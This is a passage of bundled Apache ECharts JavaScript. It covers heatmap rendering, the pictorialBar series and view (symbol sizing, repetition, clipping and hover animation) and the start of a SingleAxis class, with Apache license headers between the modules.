     var x2 = Math.min(rect.width + rect.x, api.getWidth());\n        var y2 = Math.min(rect.height + rect.y, api.getHeight());\n        var width = x2 - x;\n        var height = y2 - y;\n\n        var dims = [\n            data.mapDimension('lng'),\n            data.mapDimension('lat'),\n            data.mapDimension('value')\n        ];\n\n        var points = data.mapArray(dims, function (lng, lat, value) {\n            var pt = geo.dataToPoint([lng, lat]);\n            pt[0] -= x;\n            pt[1] -= y;\n            pt.push(value);\n            return pt;\n        });\n\n        var dataExtent = visualMapModel.getExtent();\n        var isInRange = visualMapModel.type === 'visualMap.continuous'\n            ? getIsInContinuousRange(dataExtent, visualMapModel.option.range)\n            : getIsInPiecewiseRange(\n                dataExtent, visualMapModel.getPieceList(), visualMapModel.option.selected\n            );\n\n        hmLayer.update(\n            points, width, height,\n            inRangeVisuals.color.getNormalizer(),\n            {\n                inRange: inRangeVisuals.color.getColorMapper(),\n                outOfRange: outOfRangeVisuals.color.getColorMapper()\n            },\n            isInRange\n        );\n        var img = new ZImage({\n            style: {\n                width: width,\n                height: height,\n                x: x,\n                y: y,\n                image: hmLayer.canvas\n            },\n            silent: true\n        });\n        this.group.add(img);\n    },\n\n    dispose: function () {}\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar PictorialBarSeries = BaseBarSeries.extend({\n\n    type: 'series.pictorialBar',\n\n    dependencies: ['grid'],\n\n    defaultOption: {\n        symbol: 'circle',     // Customized bar shape\n        symbolSize: null,     // Can be ['100%', '100%'], null means auto.\n        symbolRotate: null,\n\n        symbolPosition: null, // 'start' or 'end' or 'center', null means auto.\n        symbolOffset: null,\n        symbolMargin: null,   // start margin and end margin. Can be a number or a percent string.\n                                // Auto margin by defualt.\n        symbolRepeat: false,  // false/null/undefined, means no repeat.\n                                // Can be true, means auto calculate repeat times and cut by data.\n                                // Can be a number, specifies repeat times, and do not cut by data.\n                                // Can be 'fixed', means auto calculate repeat times but do not cut by data.\n        symbolRepeatDirection: 'end', // 'end' means from 'start' to 'end'.\n\n        symbolClip: false,\n        symbolBoundingData: null, // Can be 60 or -40 or [-40, 60]\n        symbolPatternSize: 400, // 400 * 400 px\n\n        barGap: '-100%',      // In most case, overlap is needed.\n\n        // z can be set in data item, which is z2 actually.\n\n        // Disable progressive\n        progressive: 0,\n        hoverAnimation: false // Open only when needed.\n    },\n\n    getInitialData: function (option) {\n        // Disable stack.\n        option.stack = null;\n        return PictorialBarSeries.superApply(this, 'getInitialData', arguments);\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar BAR_BORDER_WIDTH_QUERY$1 = ['itemStyle', 'borderWidth'];\n\n// index: +isHorizontal\nvar LAYOUT_ATTRS = [\n    {xy: 'x', wh: 'width', index: 0, posDesc: ['left', 'right']},\n    {xy: 'y', wh: 'height', index: 1, posDesc: ['top', 'bottom']}\n];\n\nvar pathForLineWidth = new Circle();\n\nvar BarView$1 = extendChartView({\n\n    type: 'pictorialBar',\n\n    render: function (seriesModel, ecModel, api) {\n        var group = this.group;\n        var data = seriesModel.getData();\n        var oldData = this._data;\n\n        var cartesian = seriesModel.coordinateSystem;\n        var baseAxis = cartesian.getBaseAxis();\n        var isHorizontal = !!baseAxis.isHorizontal();\n        var coordSysRect = cartesian.grid.getRect();\n\n        var opt = {\n            ecSize: {width: api.getWidth(), height: api.getHeight()},\n            seriesModel: seriesModel,\n            coordSys: cartesian,\n            coordSysExtent: [\n                [coordSysRect.x, coordSysRect.x + coordSysRect.width],\n                [coordSysRect.y, coordSysRect.y + coordSysRect.height]\n            ],\n            isHorizontal: isHorizontal,\n            valueDim: LAYOUT_ATTRS[+isHorizontal],\n            categoryDim: LAYOUT_ATTRS[1 - isHorizontal]\n        };\n\n        data.diff(oldData)\n            .add(function (dataIndex) {\n                if (!data.hasValue(dataIndex)) {\n                    return;\n                }\n\n                var itemModel = getItemModel(data, dataIndex);\n                var symbolMeta = getSymbolMeta(data, dataIndex, itemModel, opt);\n\n                var bar = createBar(data, opt, symbolMeta);\n\n                data.setItemGraphicEl(dataIndex, bar);\n                group.add(bar);\n\n                updateCommon$1(bar, opt, symbolMeta);\n            })\n            .update(function (newIndex, oldIndex) {\n                var bar = oldData.getItemGraphicEl(oldIndex);\n\n                if (!data.hasValue(newIndex)) {\n                    group.remove(bar);\n                    return;\n                }\n\n                var itemModel = getItemModel(data, newIndex);\n                var symbolMeta = getSymbolMeta(data, newIndex, itemModel, opt);\n\n                var pictorialShapeStr = getShapeStr(data, symbolMeta);\n                if (bar && pictorialShapeStr !== bar.__pictorialShapeStr) {\n                    group.remove(bar);\n                    data.setItemGraphicEl(newIndex, null);\n                    bar = null;\n                }\n\n                if (bar) {\n                    updateBar(bar, opt, symbolMeta);\n                }\n                else {\n                    bar = createBar(data, opt, symbolMeta, true);\n                }\n\n                data.setItemGraphicEl(newIndex, bar);\n                bar.__pictorialSymbolMeta = symbolMeta;\n                // Add back\n                group.add(bar);\n\n                updateCommon$1(bar, opt, symbolMeta);\n            })\n            .remove(function (dataIndex) {\n                var bar = oldData.getItemGraphicEl(dataIndex);\n                bar && removeBar(oldData, dataIndex, bar.__pictorialSymbolMeta.animationModel, bar);\n            })\n            .execute();\n\n        this._data = data;\n\n        return this.group;\n    },\n\n    dispose: noop,\n\n    remove: function (ecModel, api) {\n        var group = this.group;\n        var data = this._data;\n        if (ecModel.get('animation')) {\n            if (data) {\n                data.eachItemGraphicEl(function (bar) {\n                    removeBar(data, bar.dataIndex, ecModel, bar);\n                });\n            }\n        }\n        else {\n            group.removeAll();\n        }\n    }\n});\n\n\n// Set or calculate default value about symbol, and calculate layout info.\nfunction getSymbolMeta(data, dataIndex, itemModel, opt) {\n    var layout = data.getItemLayout(dataIndex);\n    var symbolRepeat = itemModel.get('symbolRepeat');\n    var symbolClip = itemModel.get('symbolClip');\n    var symbolPosition = itemModel.get('symbolPosition') || 'start';\n    var symbolRotate = itemModel.get('symbolRotate');\n    var rotation = (symbolRotate || 0) * Math.PI / 180 || 0;\n    var symbolPatternSize = itemModel.get('symbolPatternSize') || 2;\n    var isAnimationEnabled = itemModel.isAnimationEnabled();\n\n    var symbolMeta = {\n        dataIndex: dataIndex,\n        layout: layout,\n        itemModel: itemModel,\n        symbolType: data.getItemVisual(dataIndex, 'symbol') || 'circle',\n        color: data.getItemVisual(dataIndex, 'color'),\n        symbolClip: symbolClip,\n        symbolRepeat: symbolRepeat,\n        symbolRepeatDirection: itemModel.get('symbolRepeatDirection'),\n        symbolPatternSize: symbolPatternSize,\n        rotation: rotation,\n        animationModel: isAnimationEnabled ? itemModel : null,\n        hoverAnimation: isAnimationEnabled && itemModel.get('hoverAnimation'),\n        z2: itemModel.getShallow('z', true) || 0\n    };\n\n    prepareBarLength(itemModel, symbolRepeat, layout, opt, symbolMeta);\n\n    prepareSymbolSize(\n        data, dataIndex, layout, symbolRepeat, symbolClip, symbolMeta.boundingLength,\n        symbolMeta.pxSign, symbolPatternSize, opt, symbolMeta\n    );\n\n    prepareLineWidth(itemModel, symbolMeta.symbolScale, rotation, opt, symbolMeta);\n\n    var symbolSize = symbolMeta.symbolSize;\n    var symbolOffset = itemModel.get('symbolOffset');\n    if (isArray(symbolOffset)) {\n        symbolOffset = [\n            parsePercent$1(symbolOffset[0], symbolSize[0]),\n            parsePercent$1(symbolOffset[1], symbolSize[1])\n        ];\n    }\n\n    prepareLayoutInfo(\n        itemModel, symbolSize, layout, symbolRepeat, symbolClip, symbolOffset,\n        symbolPosition, symbolMeta.valueLineWidth, symbolMeta.boundingLength, symbolMeta.repeatCutLength,\n        opt, symbolMeta\n    );\n\n    return symbolMeta;\n}\n\n// bar length can be negative.\nfunction prepareBarLength(itemModel, symbolRepeat, layout, opt, output) {\n    var valueDim = opt.valueDim;\n    var symbolBoundingData = itemModel.get('symbolBoundingData');\n    var valueAxis = opt.coordSys.getOtherAxis(opt.coordSys.getBaseAxis());\n    var zeroPx = valueAxis.toGlobalCoord(valueAxis.dataToCoord(0));\n    var pxSignIdx = 1 - +(layout[valueDim.wh] <= 0);\n    var boundingLength;\n\n    if (isArray(symbolBoundingData)) {\n        var symbolBoundingExtent = [\n            convertToCoordOnAxis(valueAxis, symbolBoundingData[0]) - zeroPx,\n            convertToCoordOnAxis(valueAxis, symbolBoundingData[1]) - zeroPx\n        ];\n        symbolBoundingExtent[1] < symbolBoundingExtent[0] && (symbolBoundingExtent.reverse());\n        boundingLength = symbolBoundingExtent[pxSignIdx];\n    }\n    else if (symbolBoundingData != null) {\n        boundingLength = convertToCoordOnAxis(valueAxis, symbolBoundingData) - zeroPx;\n    }\n    else if (symbolRepeat) {\n        boundingLength = opt.coordSysExtent[valueDim.index][pxSignIdx] - zeroPx;\n    }\n    else {\n        boundingLength = layout[valueDim.wh];\n    }\n\n    output.boundingLength = boundingLength;\n\n    if (symbolRepeat) {\n        output.repeatCutLength = layout[valueDim.wh];\n    }\n\n    output.pxSign = boundingLength > 0 ? 1 : boundingLength < 0 ? -1 : 0;\n}\n\nfunction convertToCoordOnAxis(axis, value) {\n    return axis.toGlobalCoord(axis.dataToCoord(axis.scale.parse(value)));\n}\n\n// Support ['100%', '100%']\nfunction prepareSymbolSize(\n    data, dataIndex, layout, symbolRepeat, symbolClip, boundingLength,\n    pxSign, symbolPatternSize, opt, output\n) {\n    var valueDim = opt.valueDim;\n    var categoryDim = opt.categoryDim;\n    var categorySize = Math.abs(layout[categoryDim.wh]);\n\n    var symbolSize = data.getItemVisual(dataIndex, 'symbolSize');\n    if (isArray(symbolSize)) {\n        symbolSize = symbolSize.slice();\n    }\n    else {\n        if (symbolSize == null) {\n            symbolSize = '100%';\n        }\n        symbolSize = [symbolSize, symbolSize];\n    }\n\n    // Note: percentage symbolSize (like '100%') do not consider lineWidth, because it is\n    // to complicated to calculate real percent value if considering scaled lineWidth.\n    // So the actual size will bigger than layout size if lineWidth is bigger than zero,\n    // which can be tolerated in pictorial chart.\n\n    symbolSize[categoryDim.index] = parsePercent$1(\n        symbolSize[categoryDim.index],\n        categorySize\n    );\n    symbolSize[valueDim.index] = parsePercent$1(\n        symbolSize[valueDim.index],\n        symbolRepeat ? categorySize : Math.abs(boundingLength)\n    );\n\n    output.symbolSize = symbolSize;\n\n    // If x or y is less than zero, show reversed shape.\n    var symbolScale = output.symbolScale = [\n        symbolSize[0] / symbolPatternSize,\n        symbolSize[1] / symbolPatternSize\n    ];\n    // Follow convention, 'right' and 'top' is the normal scale.\n    symbolScale[valueDim.index] *= (opt.isHorizontal ? -1 : 1) * pxSign;\n}\n\nfunction prepareLineWidth(itemModel, symbolScale, rotation, opt, output) {\n    // In symbols are drawn with scale, so do not need to care about the case that width\n    // or height are too small. But symbol use strokeNoScale, where acture lineWidth should\n    // be calculated.\n    var valueLineWidth = itemModel.get(BAR_BORDER_WIDTH_QUERY$1) || 0;\n\n    if (valueLineWidth) {\n        pathForLineWidth.attr({\n            scale: symbolScale.slice(),\n            rotation: rotation\n        });\n        pathForLineWidth.updateTransform();\n        valueLineWidth /= pathForLineWidth.getLineScale();\n        valueLineWidth *= symbolScale[opt.valueDim.index];\n    }\n\n    output.valueLineWidth = valueLineWidth;\n}\n\nfunction prepareLayoutInfo(\n    itemModel, symbolSize, layout, symbolRepeat, symbolClip, symbolOffset,\n    symbolPosition, valueLineWidth, boundingLength, repeatCutLength, opt, output\n) {\n    var categoryDim = opt.categoryDim;\n    var valueDim = opt.valueDim;\n    var pxSign = output.pxSign;\n\n    var unitLength = Math.max(symbolSize[valueDim.index] + valueLineWidth, 0);\n    var pathLen = unitLength;\n\n    // Note: rotation will not effect the layout of symbols, because user may\n    // want symbols to rotate on its center, which should not be translated\n    // when rotating.\n\n    if (symbolRepeat) {\n        var absBoundingLength = Math.abs(boundingLength);\n\n        var symbolMargin = retrieve(itemModel.get('symbolMargin'), '15%') + '';\n        var hasEndGap = false;\n        if (symbolMargin.lastIndexOf('!') === symbolMargin.length - 1) {\n            hasEndGap = true;\n            symbolMargin = symbolMargin.slice(0, symbolMargin.length - 1);\n        }\n        symbolMargin = parsePercent$1(symbolMargin, symbolSize[valueDim.index]);\n\n        var uLenWithMargin = Math.max(unitLength + symbolMargin * 2, 0);\n\n        // When symbol margin is less than 0, margin at both ends will be subtracted\n        // to ensure that all of the symbols will not be overflow the given area.\n        var endFix = hasEndGap ? 0 : symbolMargin * 2;\n\n        // Both final repeatTimes and final symbolMargin area calculated based on\n        // boundingLength.\n        var repeatSpecified = isNumeric(symbolRepeat);\n        var repeatTimes = repeatSpecified\n            ? symbolRepeat\n            : toIntTimes((absBoundingLength + endFix) / uLenWithMargin);\n\n        // Adjust calculate margin, to ensure each symbol is displayed\n        // entirely in the given layout area.\n        var mDiff = absBoundingLength - repeatTimes * unitLength;\n        symbolMargin = mDiff / 2 / (hasEndGap ? repeatTimes : repeatTimes - 1);\n        uLenWithMargin = unitLength + symbolMargin * 2;\n        endFix = hasEndGap ? 0 : symbolMargin * 2;\n\n        // Update repeatTimes when not all symbol will be shown.\n        if (!repeatSpecified && symbolRepeat !== 'fixed') {\n            repeatTimes = repeatCutLength\n                ? toIntTimes((Math.abs(repeatCutLength) + endFix) / uLenWithMargin)\n                : 0;\n        }\n\n        pathLen = repeatTimes * uLenWithMargin - endFix;\n        output.repeatTimes = repeatTimes;\n        output.symbolMargin = symbolMargin;\n    }\n\n    var sizeFix = pxSign * (pathLen / 2);\n    var pathPosition = output.pathPosition = [];\n    pathPosition[categoryDim.index] = layout[categoryDim.wh] / 2;\n    pathPosition[valueDim.index] = symbolPosition === 'start'\n        ? sizeFix\n        : symbolPosition === 'end'\n        ? boundingLength - sizeFix\n        : boundingLength / 2; // 'center'\n    if (symbolOffset) {\n        pathPosition[0] += symbolOffset[0];\n        pathPosition[1] += symbolOffset[1];\n    }\n\n    var bundlePosition = output.bundlePosition = [];\n    bundlePosition[categoryDim.index] = layout[categoryDim.xy];\n    bundlePosition[valueDim.index] = layout[valueDim.xy];\n\n    var barRectShape = output.barRectShape = extend({}, layout);\n    barRectShape[valueDim.wh] = pxSign * Math.max(\n        Math.abs(layout[valueDim.wh]), Math.abs(pathPosition[valueDim.index] + sizeFix)\n    );\n    barRectShape[categoryDim.wh] = layout[categoryDim.wh];\n\n    var clipShape = output.clipShape = {};\n    // Consider that symbol may be overflow layout rect.\n    clipShape[categoryDim.xy] = -layout[categoryDim.xy];\n    clipShape[categoryDim.wh] = opt.ecSize[categoryDim.wh];\n    clipShape[valueDim.xy] = 0;\n    clipShape[valueDim.wh] = layout[valueDim.wh];\n}\n\nfunction createPath(symbolMeta) {\n    var symbolPatternSize = symbolMeta.symbolPatternSize;\n    var path = createSymbol(\n        // Consider texture img, make a big size.\n        symbolMeta.symbolType,\n        -symbolPatternSize / 2,\n        -symbolPatternSize / 2,\n        symbolPatternSize,\n        symbolPatternSize,\n        symbolMeta.color\n    );\n    path.attr({\n        culling: true\n    });\n    path.type !== 'image' && path.setStyle({\n        strokeNoScale: true\n    });\n\n    return path;\n}\n\nfunction createOrUpdateRepeatSymbols(bar, opt, symbolMeta, isUpdate) {\n    var bundle = bar.__pictorialBundle;\n    var symbolSize = symbolMeta.symbolSize;\n    var valueLineWidth = symbolMeta.valueLineWidth;\n    var pathPosition = symbolMeta.pathPosition;\n    var valueDim = opt.valueDim;\n    var repeatTimes = symbolMeta.repeatTimes || 0;\n\n    var index = 0;\n    var unit = symbolSize[opt.valueDim.index] + valueLineWidth + symbolMeta.symbolMargin * 2;\n\n    eachPath(bar, function (path) {\n        path.__pictorialAnimationIndex = index;\n        path.__pictorialRepeatTimes = repeatTimes;\n        if (index < repeatTimes) {\n            updateAttr(path, null, makeTarget(index), symbolMeta, isUpdate);\n        }\n        else {\n            updateAttr(path, null, {scale: [0, 0]}, symbolMeta, isUpdate, function () {\n                bundle.remove(path);\n            });\n        }\n\n        updateHoverAnimation(path, symbolMeta);\n\n        index++;\n    });\n\n    for (; index < repeatTimes; index++) {\n        var path = createPath(symbolMeta);\n        path.__pictorialAnimationIndex = index;\n        path.__pictorialRepeatTimes = repeatTimes;\n        bundle.add(path);\n\n        var target = makeTarget(index);\n\n        updateAttr(\n            path,\n            {\n                position: target.position,\n                scale: [0, 0]\n            },\n            {\n                scale: target.scale,\n                rotation: target.rotation\n            },\n            symbolMeta,\n            isUpdate\n        );\n\n        // FIXME\n        // If all emphasis/normal through action.\n        path\n            .on('mouseover', onMouseOver)\n            .on('mouseout', onMouseOut);\n\n        updateHoverAnimation(path, symbolMeta);\n    }\n\n    function makeTarget(index) {\n        var position = pathPosition.slice();\n        // (start && pxSign > 0) || (end && pxSign < 0): i = repeatTimes - index\n        // Otherwise: i = index;\n        var pxSign = symbolMeta.pxSign;\n        var i = index;\n        if (symbolMeta.symbolRepeatDirection === 'start' ? pxSign > 0 : pxSign < 0) {\n            i = repeatTimes - 1 - index;\n        }\n        position[valueDim.index] = unit * (i - repeatTimes / 2 + 0.5) + pathPosition[valueDim.index];\n\n        return {\n            position: position,\n            scale: symbolMeta.symbolScale.slice(),\n            rotation: symbolMeta.rotation\n        };\n    }\n\n    function onMouseOver() {\n        eachPath(bar, function (path) {\n            path.trigger('emphasis');\n        });\n    }\n\n    function onMouseOut() {\n        eachPath(bar, function (path) {\n            path.trigger('normal');\n        });\n    }\n}\n\nfunction createOrUpdateSingleSymbol(bar, opt, symbolMeta, isUpdate) {\n    var bundle = bar.__pictorialBundle;\n    var mainPath = bar.__pictorialMainPath;\n\n    if (!mainPath) {\n        mainPath = bar.__pictorialMainPath = createPath(symbolMeta);\n        bundle.add(mainPath);\n\n        updateAttr(\n            mainPath,\n            {\n                position: symbolMeta.pathPosition.slice(),\n                scale: [0, 0],\n                rotation: symbolMeta.rotation\n            },\n            {\n                scale: symbolMeta.symbolScale.slice()\n            },\n            symbolMeta,\n            isUpdate\n        );\n\n        mainPath\n            .on('mouseover', onMouseOver)\n            .on('mouseout', onMouseOut);\n    }\n    else {\n        updateAttr(\n            mainPath,\n            null,\n            {\n                position: symbolMeta.pathPosition.slice(),\n                scale: symbolMeta.symbolScale.slice(),\n                rotation: symbolMeta.rotation\n            },\n            symbolMeta,\n            isUpdate\n        );\n    }\n\n    updateHoverAnimation(mainPath, symbolMeta);\n\n    function onMouseOver() {\n        this.trigger('emphasis');\n    }\n\n    function onMouseOut() {\n        this.trigger('normal');\n    }\n}\n\n// bar rect is used for label.\nfunction createOrUpdateBarRect(bar, symbolMeta, isUpdate) {\n    var rectShape = extend({}, symbolMeta.barRectShape);\n\n    var barRect = bar.__pictorialBarRect;\n    if (!barRect) {\n        barRect = bar.__pictorialBarRect = new Rect({\n            z2: 2,\n            shape: rectShape,\n            silent: true,\n            style: {\n                stroke: 'transparent',\n                fill: 'transparent',\n                lineWidth: 0\n            }\n        });\n\n        bar.add(barRect);\n    }\n    else {\n        updateAttr(barRect, null, {shape: rectShape}, symbolMeta, isUpdate);\n    }\n}\n\nfunction createOrUpdateClip(bar, opt, symbolMeta, isUpdate) {\n    // If not clip, symbol will be remove and rebuilt.\n    if (symbolMeta.symbolClip) {\n        var clipPath = bar.__pictorialClipPath;\n        var clipShape = extend({}, symbolMeta.clipShape);\n        var valueDim = opt.valueDim;\n        var animationModel = symbolMeta.animationModel;\n        var dataIndex = symbolMeta.dataIndex;\n\n        if (clipPath) {\n            updateProps(\n                clipPath, {shape: clipShape}, animationModel, dataIndex\n            );\n        }\n        else {\n            clipShape[valueDim.wh] = 0;\n            clipPath = new Rect({shape: clipShape});\n            bar.__pictorialBundle.setClipPath(clipPath);\n            bar.__pictorialClipPath = clipPath;\n\n            var target = {};\n            target[valueDim.wh] = symbolMeta.clipShape[valueDim.wh];\n\n            graphic[isUpdate ? 'updateProps' : 'initProps'](\n                clipPath, {shape: target}, animationModel, dataIndex\n            );\n        }\n    }\n}\n\nfunction getItemModel(data, dataIndex) {\n    var itemModel = data.getItemModel(dataIndex);\n    itemModel.getAnimationDelayParams = getAnimationDelayParams;\n    itemModel.isAnimationEnabled = isAnimationEnabled;\n    return itemModel;\n}\n\nfunction getAnimationDelayParams(path) {\n    // The order is the same as the z-order, see `symbolRepeatDiretion`.\n    return {\n        index: path.__pictorialAnimationIndex,\n        count: path.__pictorialRepeatTimes\n    };\n}\n\nfunction isAnimationEnabled() {\n    // `animation` prop can be set on itemModel in pictorial bar chart.\n    return this.parentModel.isAnimationEnabled() && !!this.getShallow('animation');\n}\n\nfunction updateHoverAnimation(path, symbolMeta) {\n    path.off('emphasis').off('normal');\n\n    var scale = symbolMeta.symbolScale.slice();\n\n    symbolMeta.hoverAnimation && path\n        .on('emphasis', function () {\n            this.animateTo({\n                scale: [scale[0] * 1.1, scale[1] * 1.1]\n            }, 400, 'elasticOut');\n        })\n        .on('normal', function () {\n            this.animateTo({\n                scale: scale.slice()\n            }, 400, 'elasticOut');\n        });\n}\n\nfunction createBar(data, opt, symbolMeta, isUpdate) {\n    // bar is the main element for each data.\n    var bar = new Group();\n    // bundle is used for location and clip.\n    var bundle = new Group();\n    bar.add(bundle);\n    bar.__pictorialBundle = bundle;\n    bundle.attr('position', symbolMeta.bundlePosition.slice());\n\n    if (symbolMeta.symbolRepeat) {\n        createOrUpdateRepeatSymbols(bar, opt, symbolMeta);\n    }\n    else {\n        createOrUpdateSingleSymbol(bar, opt, symbolMeta);\n    }\n\n    createOrUpdateBarRect(bar, symbolMeta, isUpdate);\n\n    createOrUpdateClip(bar, opt, symbolMeta, isUpdate);\n\n    bar.__pictorialShapeStr = getShapeStr(data, symbolMeta);\n    bar.__pictorialSymbolMeta = symbolMeta;\n\n    return bar;\n}\n\nfunction updateBar(bar, opt, symbolMeta) {\n    var animationModel = symbolMeta.animationModel;\n    var dataIndex = symbolMeta.dataIndex;\n    var bundle = bar.__pictorialBundle;\n\n    updateProps(\n        bundle, {position: symbolMeta.bundlePosition.slice()}, animationModel, dataIndex\n    );\n\n    if (symbolMeta.symbolRepeat) {\n        createOrUpdateRepeatSymbols(bar, opt, symbolMeta, true);\n    }\n    else {\n        createOrUpdateSingleSymbol(bar, opt, symbolMeta, true);\n    }\n\n    createOrUpdateBarRect(bar, symbolMeta, true);\n\n    createOrUpdateClip(bar, opt, symbolMeta, true);\n}\n\nfunction removeBar(data, dataIndex, animationModel, bar) {\n    // Not show text when animating\n    var labelRect = bar.__pictorialBarRect;\n    labelRect && (labelRect.style.text = null);\n\n    var pathes = [];\n    eachPath(bar, function (path) {\n        pathes.push(path);\n    });\n    bar.__pictorialMainPath && pathes.push(bar.__pictorialMainPath);\n\n    // I do not find proper remove animation for clip yet.\n    bar.__pictorialClipPath && (animationModel = null);\n\n    each$1(pathes, function (path) {\n        updateProps(\n            path, {scale: [0, 0]}, animationModel, dataIndex,\n            function () {\n                bar.parent && bar.parent.remove(bar);\n            }\n        );\n    });\n\n    data.setItemGraphicEl(dataIndex, null);\n}\n\nfunction getShapeStr(data, symbolMeta) {\n    return [\n        data.getItemVisual(symbolMeta.dataIndex, 'symbol') || 'none',\n        !!symbolMeta.symbolRepeat,\n        !!symbolMeta.symbolClip\n    ].join(':');\n}\n\nfunction eachPath(bar, cb, context) {\n    // Do not use Group#eachChild, because it do not support remove.\n    each$1(bar.__pictorialBundle.children(), function (el) {\n        el !== bar.__pictorialBarRect && cb.call(context, el);\n    });\n}\n\nfunction updateAttr(el, immediateAttrs, animationAttrs, symbolMeta, isUpdate, cb) {\n    immediateAttrs && el.attr(immediateAttrs);\n    // when symbolCip used, only clip path has init animation, otherwise it would be weird effect.\n    if (symbolMeta.symbolClip && !isUpdate) {\n        animationAttrs && el.attr(animationAttrs);\n    }\n    else {\n        animationAttrs && graphic[isUpdate ? 'updateProps' : 'initProps'](\n            el, animationAttrs, symbolMeta.animationModel, symbolMeta.dataIndex, cb\n        );\n    }\n}\n\nfunction updateCommon$1(bar, opt, symbolMeta) {\n    var color = symbolMeta.color;\n    var dataIndex = symbolMeta.dataIndex;\n    var itemModel = symbolMeta.itemModel;\n    // Color must be excluded.\n    // Because symbol provide setColor individually to set fill and stroke\n    var normalStyle = itemModel.getModel('itemStyle').getItemStyle(['color']);\n    var hoverStyle = itemModel.getModel('emphasis.itemStyle').getItemStyle();\n    var cursorStyle = itemModel.getShallow('cursor');\n\n    eachPath(bar, function (path) {\n        // PENDING setColor should be before setStyle!!!\n        path.setColor(color);\n        path.setStyle(defaults(\n            {\n                fill: color,\n                opacity: symbolMeta.opacity\n            },\n            normalStyle\n        ));\n        setHoverStyle(path, hoverStyle);\n\n        cursorStyle && (path.cursor = cursorStyle);\n        path.z2 = symbolMeta.z2;\n    });\n\n    var barRectHoverStyle = {};\n    var barPositionOutside = opt.valueDim.posDesc[+(symbolMeta.boundingLength > 0)];\n    var barRect = bar.__pictorialBarRect;\n\n    setLabel(\n        barRect.style, barRectHoverStyle, itemModel,\n        color, opt.seriesModel, dataIndex, barPositionOutside\n    );\n\n    setHoverStyle(barRect, barRectHoverStyle);\n}\n\nfunction toIntTimes(times) {\n    var roundedTimes = Math.round(times);\n    // Escapse accurate error\n    return Math.abs(times - roundedTimes) < 1e-4\n        ? roundedTimes\n        : Math.ceil(times);\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// In case developer forget to include grid component\nregisterLayout(curry(\n    layout, 'pictorialBar'\n));\nregisterVisual(visualSymbol('pictorialBar', 'roundRect'));\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @constructor  module:echarts/coord/single/SingleAxis\n * @extends {module:echarts/coord/Axis}\n * @param {string} dim\n * @param {*} scale\n * @param {Array.<number>} coordExtent\n * @param {string} axisType\n * @param {string} position\n */\nvar SingleAxis = function (dim, scale, coordExtent, axisType, position) {\n\n    Axis.call(this, dim, scale, coordExtent);\n\n    /**\n     * Axis type\n     * - 'category'\n     * - 'value'\n     * - 'time'\n     * - 'log'\n     * @type {string}\n     */\n    this.type = axisType || 'value';\n\n    /**\n     * Axis position\n     *  - 'top'\n     *  - 'bottom'\n     *  - 'left'\n     *  - 'right'\n     *  @type {string}\n     */\n    this.position = position || 'bottom';\n\n    /**\n     * Axis orient\n     *  - 'horizontal'\n     *  - 'vertical'\n     * @type {[type]}\n     */\n    this.orient = null;\n\n};\n\nSingleAxis.prototype = {\n\n    constructor: SingleAxis,\n\n    /**\n     * Axis model\n     * @type {module:echarts/coord/single/AxisModel}\n     */\n    model: null,\n\n    /**\n     * Judge the orient of the axis.\n     * @return {boolean}\n     */\n    isHorizontal: function () {\n        var position = this.position;\n        return position === 'top' || position === 'bottom';\n\n    },\n\n    /**\n     * @override\n     */\n    pointToData: function (point, clamp) {\n        return this.coordinateSystem.pointToData(point, clamp)[0];\n    },\n\n    /**\n     * Convert the local coord(processed by dataToCoord())\n     * to global coord(concrete pixel coord).\n     * designated by module:echarts/coord/single/Single.\n     * @type {Function}\n     */\n    toGlobalCoord: null,\n\n    /**\n     * Convert the global coord to local coord.\n     * designated by 